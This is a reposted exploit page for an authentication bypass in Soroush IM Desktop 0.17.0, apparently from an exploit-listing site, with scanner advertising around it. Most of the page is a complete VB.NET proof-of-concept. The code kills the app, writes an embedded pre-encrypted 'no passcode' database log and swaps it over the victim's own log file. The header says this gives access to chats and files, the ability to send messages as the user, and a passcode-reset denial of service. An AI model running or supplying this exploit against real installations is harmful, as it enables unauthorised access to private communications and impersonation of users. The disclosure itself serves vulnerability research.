Registersoroush im desktop app 0.17.0 authentication bypass
▸▸▸ Exploit & Vulnerability >> local exploit & windows vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: Soroush IM Desktop App 0.17.0 - Authentication Bypass # Date: 2018-08-08 # Exploit Author: VortexNeoX64 # Vendor Homepage: https://soroush-app.ir # Software Link: http://54.36.43.176/SoroushSetup0.17.0.exe # Version: 0.17.0 BETA # Tested on: Windows 10 1803 and windows server 2016 14393 # Security Issue: # It seems that all databases are encrypted with a constant key and then producing same output # across every other PCs so pushing NO_PASSCODE data ,that was encrypted before, to the databases # on any other PC, would process the database valid and remove the passcode. The database entriesd are first # entered in a log file in the same folder of the database, and then the Soroush app pushes the log file # into permanent database. Attacker can unlock the client app with database injection, and bypass the # authentication process. This exploit leads to two important security risks: # 1.Attacker can access to all the data, chats, images, files and etc. then he/she is able to send and receive data in behalf of the original user # 2.Attacker then may use the exploit to perform an DOS attack. which is done by setting a new passcode for the client without knowing the previews passcode # PoC (.NET 4.0 Visual Basic) # PoC dose not support Windows XP, try change "\users\" to "\Documents and Settings\" Module Module1 Sub Main() Console.WriteLine("*** [Souroush IM Local Passcode bypass via database injection] ***") Console.WriteLine("*** [Developed by [VortexNeoX64] 2018] ***") Console.WriteLine("** [Tested on Windows 10 1803 and windows server 2016 14393 , Soroush version = 0.17.0 BETA] **") Console.WriteLine("** [Affected systems: probebly Linux, MacOS and for sure Windows] **") Console.WriteLine("** [Vulnerability type: Local & Privilege Escalation [Passcode bypass] ]**") Console.WriteLine() Console.WriteLine("Press any Key to exploit...") Console.ReadKey() Dim _temp As Byte() = {237, 4, 235, 105, 158, 3, 1, 16, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 88, 97, 81, 122, 79, 114, 86, 89, 53, 79, 111, 73, 79, 77, 90, 49, 52, 102, 83, 101, 122, 80, 113, 121, 122, 88, 49, 70, 65, 108, 56, 52, 116, 112, 87, 75, 77, 117, 115, 122, 117, 109, 72, 101, 116, 51, 43, 54, 122, 106, 55, 117, 108, 74, 66, 47, 99, 107, 110, 87, 113, 107, 84, 111, 74, 66, 52, 118, 53, 74, 120, 75, 47, 114, 122, 57, 122, 73, 53, 116, 43, 76, 122, 68, 116, 86, 81, 61, 61, 182, 6, 123, 34, 100, 97, 116, 97, 34, 58, 34, 57, 105, 105, 116, 76, 114, 118, 88, 76, 98, 99, 66, 67, 74, 52, 87, 102, 68, 55, 106, 66, 82, 72, 109, 110, 113, 66, 57, 110, 82, 85, 90, 81, 54, 85, 49, 113, 78, 120, 75, 55, 57, 98, 106, 85, 106, 109, 74, 102, 122, 105, 67, 111, 65, 100, 114, 99, 98, 82, 119, 54, 43, 75, 68, 72, 47, 108, 85, 82, 90, 77, 119, 73, 103, 70, 113, 57, 75, 57, 112, 115, 57, 97, 49, 69, 47, 77, 104, 73, 51, 51, 114, 80, 83, 81, 113, 99, 117, 49, 89, 87, 101, 49, 83, 75, 98, 103, 78, 84, 72, 113, 89, 82, 87, 71, 73, 43, 88, 111, 85, 105, 69, 55, 72, 120, 121, 120, 57, 50, 90, 116, 116, 43, 81, 75, 100, 103, 114, 67, 77, 120, 122, 65, 66, 66, 50, 117, 85, 87, 68, 119, 67, 113, 68, 105, 53, 67, 111, 86, 69, 108, 77, 43, 113, 90, 106, 118, 75, 100, 66, 99, 112, 120, 99, 47, 110, 80, 84, 67, 55, 117, 111, 116, 86, 115, 89, 50, 89, 55, 88, 89, 49, 88, 52, 78, 69, 52, 100, 105, 110, 71, 120, 67, 87, 118, 118, 73, 106, 107, 80, 51, 85, 114, 75, 48, 51, 100, 67, 114, 71, 85, 75, 119, 98, 70, 48, 85, 101, 73, 50, 77, 108, 97, 84, 67, 100, 49, 97, 77, 43, 119, 83, 80, 111, 99, 110, 105, 66, 97, 67, 48, 52, 56, 82, 83, 110, 97, 120, 75, 56, 88, 55, 84, 89, 83, 111, 65, 111, 115, 98, 117, 78, 80, 66, 110, 103, 72, 52, 110, 68, 97, 112, 74, 84, 104, 108, 120, 104, 85, 78, 117, 70, 103, 57, 48, 98, 65, 87, 100, 83, 111, 75, 105, 69, 65, 56, 69, 106, 105, 52, 120, 69, 111, 97, 49, 70, 109, 73, 49, 69, 83, 110, 67, 66, 117, 114, 76, 111, 70, 75, 53, 73, 111, 81, 49, 74, 115, 79, 105, 74, 108, 119, 51, 89, 116, 69, 70, 71, 121, 121, 102, 76, 110, 85, 73, 121, 56, 49, 54, 85, 71, 80, 87, 69, 53, 79, 90, 53, 74, 72, 50, 66, 117, 84, 47, 79, 90, 65, 77, 111, 57, 88, 115, 88, 68, 105, 77, 121, 108, 111, 66, 105, 105, 75, 81, 49, 56, 117, 50, 85, 104, 78, 109, 97, 119, 79, 67, 74, 78, 120, 53, 108, 51, 118, 48, 68, 104, 84, 51, 76, 75, 106, 69, 103, 55, 86, 84, 115, 79, 80, 65, 121, 118, 54, 90, 90, 83, 118, 82, 51, 67, 118, 109, 66, 86, 57, 108, 52, 114, 70, 120, 71, 50, 52, 108, 113, 66, 70, 70, 101, 115, 105, 120, 88, 102, 74, 122, 108, 90, 69, 111, 68, 120, 80, 115, 70, 109, 116, 88, 67, 65, 110, 65, 86, 106, 70, 74, 54, 49, 80, 67, 104, 104, 84, 120, 67, 116, 115, 82, 73, 108, 78, 77, 109, 90, 122, 77, 90, 80, 73, 99, 80, 104, 115, 68, 83, 80, 80, 72, 76, 98, 49, 56, 56, 67, 84, 80, 80, 47, 116, 85, 48, 72, 122, 116, 101, 83, 105, 68, 47, 66, 97, 84, 107, 50, 104, 102, 121, 82, 66, 114, 72, 78, 75, 56, 118, 89, 101, 122, 122, 82, 117, 85, 102, 43, 78, 111, 111, 79, 43, 90, 73, 51, 69, 71, 90, 52, 69, 57, 48, 75, 101, 80, 82, 52, 48, 122, 76, 49, 118, 116, 68, 65, 78, 98, 80, 47, 109, 57, 122, 53, 87, 83, 105, 113, 118, 110, 47, 111, 66, 69, 78, 51, 100, 67, 72, 106, 120, 80, 81, 55, 119, 54, 78, 68, 120, 108, 86, 108, 83, 117, 119, 113, 120, 78, 87, 47, 86, 102, 117, 65, 74, 77, 84, 84, 121, 103, 73, 80, 89, 87, 73, 117, 85, 111, 101, 54, 118, 106, 71, 83, 69, 118, 101, 78, 80, 72, 121, 99, 99, 88, 122, 90, 76, 122, 71, 90, 102, 66, 85, 87, 81, 101, 75, 74, 99, 86, 68, 80, 103, 109, 43, 88, 66, 80, 73, 56, 47, 101, 107, 111, 101, 71, 104, 108, 97, 107, 70, 75, 85, 112, 112, 57, 75, 99, 102, 111, 111, 97, 75, 51, 56, 48, 121, 78, 115, 87, 118, 52, 119, 88, 51, 65, 116, 51, 118, 111, 114, 74, 81, 101, 119, 117, 89, 97, 76, 78, 114, 116, 52, 68, 121, 122, 90, 107, 52, 98, 117, 68, 110, 87, 119, 85, 48, 97, 122, 109, 104, 71, 111, 69, 119, 88, 66, 78, 108, 81, 79, 89, 54, 49, 117, 66, 103, 78, 110, 78, 103, 82, 65, 61, 61, 34, 44, 34, 116, 121, 112, 101, 34, 58, 34, 112, 114, 105, 109, 105, 116, 105, 118, 101, 34, 125} Try Console.WriteLine("Killing the app...") Shell("Taskkill /im soroush.exe /f /t ", AppWinStyle.Hide, True) Console.WriteLine("Making malicious database...") Dim target As String = "" Dim targetname As String = "" Dim index As Integer = 0 Dim _info As IO.FileInfo() Dim _Dirinfo As New IO.DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.System).Substring(0, 1) & ":\Users\" & Environment.UserName & "\AppData\Roaming\Soroush\Data\73b880c1b168541ab6e01acc2f7bf46f06379320\") IO.File.WriteAllBytes(Environment.CurrentDirectory & "\log.log", _temp) Console.WriteLine("Getting orginal database name....") _info = _Dirinfo.GetFiles() For i = 0 To _info.Count - 1 If _info(i).Extension = ".log" Then target = _info(i).FullName targetname = _info(i).Name index = i Exit For End If Next Console.WriteLine("Target file is : [" & target & "]") Console.WriteLine("Renaming malicious database to [" & targetname & "]") IO.File.Move(Environment.CurrentDirectory & "\log.log", Environment.CurrentDirectory & "\" & targetname) Console.WriteLine("injecting database [" & target & "]") Threading.Thread.Sleep(1500) IO.File.Delete(target) IO.File.Copy(Environment.CurrentDirectory & "\" & targetname, target) Console.WriteLine("Done!") Catch ex As Exception Console.WriteLine(ex.Message) Beep() Finally Console.ReadKey() End Try End Sub End Module
Soroush im desktop app 0.17.0 authentication bypass Vulnerability / Exploit Source : Soroush im desktop app 0.17.0 authentication bypass
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes